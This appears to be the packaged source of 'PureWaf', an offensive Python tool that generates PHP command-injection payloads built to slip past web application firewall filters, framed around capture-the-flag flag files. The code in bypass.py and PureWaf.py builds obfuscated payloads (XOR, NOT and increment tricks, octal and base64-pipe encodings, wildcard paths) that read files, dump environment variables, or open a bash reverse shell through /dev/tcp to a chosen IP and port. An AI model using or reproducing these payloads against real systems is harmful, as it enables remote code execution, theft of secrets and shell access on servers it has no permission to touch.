PureWaf 1.0__py3-none-any.whl

PureWaf/PureWaf.py

@@ -0,0 +1,269 @@
+# main package
+
+import logging
+import os
+import sys
+import time
+
+from . import bypass
+from . import bypass_data
+from . import utils
+
+version = "1.0"
+
+SPECIAL_UPLOAD_POC_PAYLOAD = bypass_data.SPECIAL_UPLOAD_POC_TRIGGER_PAYLOADS[1]
+SPECIAL_UPLOAD_POC_EGS = bypass_data.SPECIAL_UPLOAD_POC_EGS
+BACKTRACK_LIMIT_POC_EGS = bypass_data.BACKTRACK_LIMIT_POC_EGS
+
+
+def banner(version_text):
+    return rf"""
+ ____                      __        __     ___
+|  _ \ _   _ _ __ ___      \ \      / /_ _ |  _|
+| |_) | | | | '__/ _ \      \ \ /\ / / _` /| |_
+|  __/| |_| | | | (_) |      \ V  V / (_| \|  _|
+|_|    \__,_|_|  \___/        \_/\_/ \__,_||_|
+
+    [ PureWaf :: Pure You Hate ]
+    [ Author  :: Pure Stream ]
+    [ Version :: {version_text}]
+    [ Github  :: https://github.com/PureStream108/PureWaf ]
+
+
+"""
+
+
+def _configure_logger(log_level: str):
+    logger = logging.getLogger("PureWaf")
+    if not logger.handlers:
+        handler = logging.StreamHandler(sys.stdout)
+        formatter = logging.Formatter("%(message)s")
+        handler.setFormatter(formatter)
+        logger.addHandler(handler)
+
+    level_name = (log_level or "INFO").upper()
+    if level_name not in ["DEBUG", "INFO", "QUIET"]:
+        logger.warning("[!] Invalid log level, using INFO instead.")
+        level_name = "INFO"
+
+    show_progress = True
+    if level_name == "QUIET":
+        logger.setLevel(logging.CRITICAL)
+        sys.stdout = open(os.devnull, "w")
+        show_progress = False
+    else:
+        logger.setLevel(getattr(logging, level_name))
+
+    if level_name != "DEBUG":
+        import warnings
+
+        warnings.filterwarnings("ignore")
+
+    return logger, show_progress
+
+
+def _emit_special_payload_egs(logger, payload):
+    if payload not in bypass_data.SPECIAL_UPLOAD_POC_TRIGGER_PAYLOADS:
+        return
+    logger.info("Example: ")
+    for line in bypass_data.SPECIAL_UPLOAD_POC_EGS.splitlines():
+        logger.info(line)
+
+
+def _extract_regex_pattern(waf_regex: str):
+    if not waf_regex:
+        return ""
+    pattern = waf_regex.strip()
+    if pattern.startswith("/") and pattern.count("/") >= 2:
+        last = pattern.rfind("/")
+        return pattern[1:last]
+    return pattern
+
+
+def _looks_like_backtrack_risk_regex(waf_regex: str):
+    pattern = _extract_regex_pattern(waf_regex)
+    if not pattern:
+        return False
+
+    lowered = pattern.lower()
+    if "(?r)" in lowered or "(?0)" in lowered:
+        return True
+
+    has_anchors = "^" in pattern and "$" in pattern
+    has_greedy_prefix = ".*(" in pattern or ".+(" in pattern
+    has_repeat = "*" in pattern or "+" in pattern or "{" in pattern
+    has_wide_class = r"\w" in pattern or r"\W" in pattern
+
+    return has_anchors and has_greedy_prefix and has_repeat and has_wide_class
+
+
+def _emit_contextual_tips(logger, payload, waf_regex):
+    _emit_special_payload_egs(logger, payload)
+
+    if payload in bypass_data.HEADER_TIP_TRIGGER_PAYLOADS:
+        logger.info("TIPS: User-Agent: 1=system('id');")
+        logger.info("TIPS: User-Agent: system('id');")
+
+    if payload in bypass_data.VARIABLE_HIJACK_TIP_TRIGGER_PAYLOADS:
+        logger.info("TIPS: POST: 1=system('id');")
+
+    if _looks_like_backtrack_risk_regex(waf_regex):
+        logger.info("Example (Backtrack limit bypass):")
+        for line in BACKTRACK_LIMIT_POC_EGS.splitlines():
+            logger.info(line)
+
+
+def purewaf(
+    waf_words="",
+    waf_chars="",
+    waf_regex="",
+    limit_length=999999,
+    flagfile="/flag",
+    read_env=False,
+    reflect_shell=False,
+    port=8080,
+    ip="127.0.0.1",
+    phpinfo=False,
+    log_level="INFO",
+    total_payload=False,
+    phpv=7.0,
+):
+    logger, show_progress = _configure_logger(log_level)
+    logger.info(banner(version).rstrip())
+    time.sleep(1)
+
+    # 校验版本
+    try:
+        phpv = float(phpv)
+    except (ValueError, TypeError):
+        logger.error(f"[!] Invalid php_version: {phpv}. Using default 7.0")
+        phpv = 7.0
+
+    # 打印配置
+    logger.info("")
+    logger.info("-" * 40)
+    logger.info(f"[*] Configuration:")
+    logger.info(f"    - waf_words: {waf_words}")
+    logger.info(f"    - waf_chars: {waf_chars}")
+    logger.info(f"    - waf_regex: {waf_regex}")
+    logger.info(f"    - limit_length: {limit_length}")
+    logger.info(f"    - flagfile: {flagfile}")
+    logger.info(f"    - read_env: {read_env}")
+    logger.info(f"    - reflect_shell: {reflect_shell}")
+    logger.info(f"    - port: {port}")
+    logger.info(f"    - ip: {ip}")
+    logger.info(f"    - phpinfo: {phpinfo}")
+    logger.info(f"    - phpv: {phpv}")
+    logger.info(f"    - log_level: {log_level}")
+    logger.info(f"    - total_payload: {total_payload}")
+    logger.info("-" * 40)
+    logger.info("")
+
+    waf_words_list = utils.parse_waf_words(waf_words)
+    waf_chars_set = utils.parse_waf_chars(waf_chars)
+    waf_regex_obj = utils.parse_waf_regex(waf_regex)
+
+    options_root = bypass.BypassOptions(
+        flagfile="/",  # 初始默认根目录
+        read_env=False,
+        reflect_shell=False,
+        ip=ip,
+        port=port,
+        phpinfo=False,
+        php_version=phpv,
+    )
+
+    options_flag = bypass.BypassOptions(
+        flagfile=flagfile,
+        read_env=read_env,
+        reflect_shell=reflect_shell,
+        ip=ip,
+        port=port,
+        phpinfo=phpinfo,
+        php_version=phpv,
+    )
+
+    # 生成 payload
+    logger.info("[*] Generating payloads for Root Directory...")
+    base_payloads_root = bypass.generate_candidates(options_root)
+    if not base_payloads_root:
+        logger.warning("[!] No base payloads generated for Root Directory.")
+        shortest_root = "N/A"
+    else:
+        strategies = utils.get_encoding_strategies()
+        encoded_payloads_root = bypass.apply_encodings(base_payloads_root, strategies)
+        passed_root = bypass.filter_payloads(
+            encoded_payloads_root,
+            waf_words_list,
+            waf_chars_set,
+            waf_regex_obj,
+            limit_length,
+            show_progress=show_progress,
+            verbose=total_payload,
+        )
+        if not passed_root:
+            logger.warning("[!] No payload passed WAF filters for Root Directory.")
+            shortest_root = "N/A"
+        else:
+            shortest_root = min(passed_root, key=len)
+
+    logger.info("")
+
+    logger.info("[*] Generating payloads for Flag File...")
+    base_payloads_flag = bypass.generate_candidates(options_flag)
+    if not base_payloads_flag:
+        logger.warning("[!] No base payloads generated for Flag File.")
+        shortest_flag = "N/A"
+    else:
+        encoded_payloads_flag = bypass.apply_encodings(base_payloads_flag, strategies)
+        passed_flag = bypass.filter_payloads(
+            encoded_payloads_flag,
+            waf_words_list,
+            waf_chars_set,
+            waf_regex_obj,
+            limit_length,
+            show_progress=show_progress,
+            verbose=total_payload,
+        )
+        if not passed_flag:
+            logger.warning("[!] No payload passed WAF filters for Flag File.")
+            shortest_flag = "N/A"
+        else:
+            shortest_flag = min(passed_flag, key=len)
+
+    logger.info("")
+    logger.info("-" * 40)
+    logger.info(f"[+] Shortest Root Payload : {shortest_root}")
+    logger.info(f"[+] Shortest Flag Payload : {shortest_flag}")
+    logger.info("-" * 40)
+    logger.info("")
+    _emit_contextual_tips(logger, shortest_flag, waf_regex)
+    logger.info("")
+
+    return shortest_flag
+
+
+def main():
+    import argparse
+
+    parser = argparse.ArgumentParser(description="PureWaf - WAF Bypass Payload Generator")
+    parser.add_argument("--waf_words", default="", help="Comma separated forbidden words")
+    parser.add_argument("--waf_chars", default="", help="Forbidden characters")
+    parser.add_argument("--waf_regex", default="", help="Forbidden regex")
+    parser.add_argument("--limit_length", type=int, default=999999, help="Max payload length")
+    parser.add_argument("--flagfile", default="/flag", help="Target file to read")
+    parser.add_argument("--read_env", action="store_true", help="Generate env reading payloads")
+    parser.add_argument("--reflect_shell", action="store_true", help="Generate reverse shell payloads")
+    parser.add_argument("--port", type=int, default=8080, help="Reverse shell port")
+    parser.add_argument("--ip", default="127.0.0.1", help="Reverse shell IP")
+    parser.add_argument("--phpinfo", action="store_true", help="Generate phpinfo payloads")
+    parser.add_argument("--log_level", default="INFO", help="Log level")
+    parser.add_argument("--total_payload", action="store_true", help="Show all passed payloads")
+    parser.add_argument("--phpv", default=7.0, type=float, help="PHP Version (e.g. 5.6, 7.4)")
+
+    args = parser.parse_args()
+    purewaf(**vars(args))
+
+
+if __name__ == "__main__":
+    main()

PureWaf/__init__.py

@@ -0,0 +1,3 @@
+from .PureWaf import banner, purewaf, version
+
+__all__ = ["purewaf", "version", "banner"]

PureWaf/bypass.py

@@ -0,0 +1,301 @@
+from dataclasses import dataclass
+
+from . import bypass_data
+from . import utils
+
+
+@dataclass
+class BypassOptions:
+    flagfile: str
+    read_env: bool
+    reflect_shell: bool
+    ip: str
+    port: int
+    phpinfo: bool
+    php_version: float = 7.0
+
+
+def _octal_encode(command: str):
+    """
+    八进制
+    """
+    encoded = "".join(f"\\{oct(ord(c))[2:]}" for c in command)
+    return f"$'{encoded}'"
+
+
+def _wildcard_bypass(path: str):
+    """
+    通配符
+    """
+    if not path or path == "/":
+        return path
+    parts = path.split("/")
+    new_parts = []
+    for p in parts:
+        if len(p) > 1:
+            new_parts.append(p[0] + "?" * (len(p) - 1))
+        else:
+            new_parts.append(p)
+    return "/".join(new_parts)
+
+
+def _base64_pipe_bypass(command: str):
+    """
+    变量拆分
+    """
+    import base64
+
+    b64_cmd = base64.b64encode(command.encode()).decode()
+
+    assign_base64, concat_base64 = utils._split_string_to_vars("base64")
+    assign_sh, concat_sh = utils._split_string_to_vars("sh")
+
+    assign_echo, concat_echo = utils._split_string_to_vars("echo")
+
+    payload = f"{assign_base64}{assign_sh}{assign_echo} {concat_echo} {b64_cmd}| {concat_base64} -d| {concat_sh}"
+
+    return payload
+
+
+def _generate_php_rce_payloads(command: str, php_version: float):
+    """
+    生成无字母数字
+    """
+    payloads = []
+
+    for template in bypass_data.BACKTICK_TEMPLATES:
+        if "{path}" in template:
+            pass
+        else:
+            payloads.append(template.replace("{path}", command))
+
+    payloads.append(f"`{command}`")
+
+    wrappers = bypass_data.PHP_EXEC_WRAPPERS
+
+    for func in wrappers:
+        # 适用于 php7.0
+        if php_version >= 7.0:
+            not_func = utils.generate_php_not(func)
+            not_arg = utils.generate_php_not(command)
+            if not_func and not_arg:
+                payloads.append(f"{not_func}({not_arg});")
+
+        # 异或构造
+        xor_func = utils.generate_php_xor(func)
+        xor_arg = utils.generate_php_xor(command)
+        if xor_func and xor_arg:
+            # $_=...; $_(...);
+            var_func = "$_"
+            payloads.append(f"{var_func}={xor_func};{var_func}({xor_arg});")
+
+        # 自增
+        inc_func_code = utils.generate_php_increment(func)
+        inc_arg_code = utils.generate_php_increment(command)
+
+        if inc_func_code and inc_arg_code:
+            if xor_arg:
+                payloads.append(f"{inc_func_code};$_____({xor_arg});")
+
+    return payloads
+
+
+def _append_upload_exec_payloads(payloads):
+    # 最终验证包装
+    payloads.extend(bypass_data.UPLOAD_EXEC_TEMPLATES)
+    for cmd in bypass_data.UPLOAD_EXEC_TEMPLATES:
+        for wrapper in bypass_data.UPLOAD_EXEC_WRAPPER_TEMPLATES:
+            payloads.append(wrapper.format(cmd=cmd))
+
+
+def generate_candidates(options: BypassOptions):
+    payloads = []
+
+    # 收集用于命令执行生成的目标命令
+    target_cmd = None
+    if options.flagfile:
+        target_cmd = f"cat {options.flagfile}"
+
+        for template in bypass_data.READFILE_TEMPLATES:
+            # 原始路径
+            payloads.append(template.format(path=options.flagfile, keyword="flag"))
+            # 通配符路径
+            payloads.append(template.format(path=_wildcard_bypass(options.flagfile), keyword="flag"))
+            # 转义路径
+            payloads.append(template.format(path=utils.obfuscate_filename_escape(options.flagfile), keyword="flag"))
+            # 引号路径
+            payloads.append(template.format(path=utils.obfuscate_filename_quotes(options.flagfile), keyword="flag"))
+
+        # 反引号 ``
+        for template in bypass_data.BACKTICK_TEMPLATES:
+            payloads.append(template.format(path=options.flagfile))
+
+        # 包含 include
+        for template in bypass_data.INCLUDE_TEMPLATES:
+            payloads.append(template.format(path=options.flagfile))
+
+        # 文件枚举
+        payloads.extend(bypass_data.FILE_ENUM_TEMPLATES)
+
+    if options.read_env:
+        payloads.extend(bypass_data.READ_ENV_TEMPLATES)
+
+        # 嵌套目录枚举
+        payloads.extend(bypass_data.DIRECTORY_ENUM_TEMPLATES)
+
+        _append_upload_exec_payloads(payloads)
+
+        # 日志包含
+        payloads.extend(bypass_data.LOG_INCLUSION_TEMPLATES)
+        target_cmd = "env"
+
+    if options.reflect_shell:
+        for template in bypass_data.REFLECT_SHELL_TEMPLATES:
+            payloads.append(template.format(ip=options.ip, port=options.port))
+
+        _append_upload_exec_payloads(payloads)
+
+        # 反弹shell
+
+        shell_cmd = f"bash -c 'bash -i >& /dev/tcp/{options.ip}/{options.port} 0>&1'"
+        for template in bypass_data.WEBSHELL_TEMPLATES:
+            payloads.append(template.format(cmd=shell_cmd))
+
+        target_cmd = shell_cmd
+
+    if options.phpinfo:
+        for template in bypass_data.PHPINFO_TEMPLATES:
+            if template.startswith("(") and template.endswith(");"):
+                # 对php版本进行判断
+                if options.php_version < 7.0:
+                    continue
+            payloads.append(template)
+        target_cmd = "phpinfo" 
+
+    # Header 链利用
+    if options.read_env or options.phpinfo:
+        payloads.extend(bypass_data.HEADER_EXEC_TEMPLATES)
+
+    # 变量劫持
+    if options.reflect_shell or options.phpinfo:
+        payloads.extend(bypass_data.VARIABLE_HIJACK_TEMPLATES)
+
+    if target_cmd:
+        if target_cmd == "phpinfo":
+            # 自增
+            inc_code = utils.generate_php_increment("phpinfo")
+            if inc_code:
+                payloads.append(f"{inc_code};$_____();")
+
+            if options.php_version >= 7.0:
+                not_code = utils.generate_php_not("phpinfo")
+                payloads.append(f"{not_code}();")
+        else:
+            rce_payloads = _generate_php_rce_payloads(target_cmd, options.php_version)
+            payloads.extend(rce_payloads)
+
+    current_payloads = payloads.copy()
+    for p in current_payloads:
+        if ";" in p or "(" in p or "$_" in p:
+            for tag_tmpl in bypass_data.SHORT_TAG_TEMPLATES:
+                payloads.append(tag_tmpl.format(payload=p))
+
+    # 对当前已生成载荷应用编码管道绕过
+    base_payloads = payloads.copy()
+    for p in base_payloads:
+        # 仅作用于命令字符串
+        if ";" not in p and "(" not in p:
+            payloads.append(_base64_pipe_bypass(p))
+
+    # 八进制编码
+    simple_cmds = ["ls", "cat /flag", "tac /flag", "env"]
+    for cmd in simple_cmds:
+        payloads.append(_octal_encode(cmd))
+
+    # 空格 bypass
+    candidates = payloads.copy()
+    for p in payloads:
+        if " " in p:
+            for template in bypass_data.SPACE_BYPASS_TEMPLATES:
+                candidates.append(template.format(payload=p))
+
+    return utils.dedupe_preserve_order(candidates)
+
+
+def apply_encodings(payloads, strategies):
+    encoded = []
+    for payload in payloads:
+        for _name, encoder in strategies:
+            try:
+                encoded.append(encoder(payload))
+            except Exception:
+                continue
+    return utils.dedupe_preserve_order(encoded)
+
+
+def filter_payloads(
+    payloads,
+    waf_words,
+    waf_chars,
+    waf_regex,
+    limit_length,
+    show_progress=True,
+    verbose=False,
+):
+    passed = []
+    progress = ProgressBar(len(payloads), verbose=verbose) if show_progress else None
+    for idx, payload in enumerate(payloads, start=1):
+        if progress:
+            progress.update(idx)
+        if utils.is_payload_allowed(payload, waf_words, waf_chars, waf_regex, limit_length):
+            passed.append(payload)
+            if progress:
+                progress.mark_pass(payload)
+    if progress:
+        progress.finish()
+    return passed
+
+
+class ProgressBar:
+    def __init__(self, total, width=24, stream=None, verbose=False):
+        self.total = max(int(total), 0)
+        self.width = max(int(width), 5)
+        self.stream = stream
+        self.current = 0
+        self.passed = 0
+        self.verbose = verbose
+
+    def update(self, current):
+        self.current = current
+        self._write_line()
+
+    def mark_pass(self, payload):
+        self.passed += 1
+        if self.verbose:
+            self._write_line(end="\n")
+            self._write(f"PASS: {payload}\n")
+        else:
+            self._write_line()
+
+    def finish(self):
+        self.current = self.total
+        self._write_line(end="\n")
+
+    def _write_line(self, end=""):
+        bar = self._render_bar()
+        msg = f"\r{bar} {self.current}/{self.total} passed:{self.passed}"
+        self._write(msg + end)
+
+    def _render_bar(self):
+        if self.total <= 0:
+            filled = 0
+        else:
+            filled = int(self.width * (self.current / self.total))
+        return "[" + ("=" * filled).ljust(self.width, ".") + "]"
+
+    def _write(self, text):
+        import sys
+
+        stream = self.stream or sys.stdout
+        stream.write(text)
+        stream.flush()